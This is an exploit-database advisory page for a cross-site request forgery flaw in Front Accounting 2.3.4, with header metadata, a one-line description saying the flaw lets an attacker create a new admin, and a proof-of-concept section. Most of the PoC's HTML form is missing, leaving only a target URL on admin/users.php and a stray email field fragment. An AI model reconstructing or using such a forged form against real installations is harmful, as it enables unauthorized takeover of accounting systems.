Front Accounting 2.3.4 CSRF Vulnerability



EKU-ID: 132 CVE: OSVDB-ID:
Author: John Published: 2011-05-04 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Software................Front Accounting 2.3.4
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Low (1/5)
# Download................http://frontaccounting.com/wb3/
# Discovery Date..........4/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A cross-site request forgery vulnerability in Front Accounting 2.3.4
# can be exploited to create a new admin.
#
#
# --PoC-->


   
       

http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml">
           
           
           
           
            x@x.com" />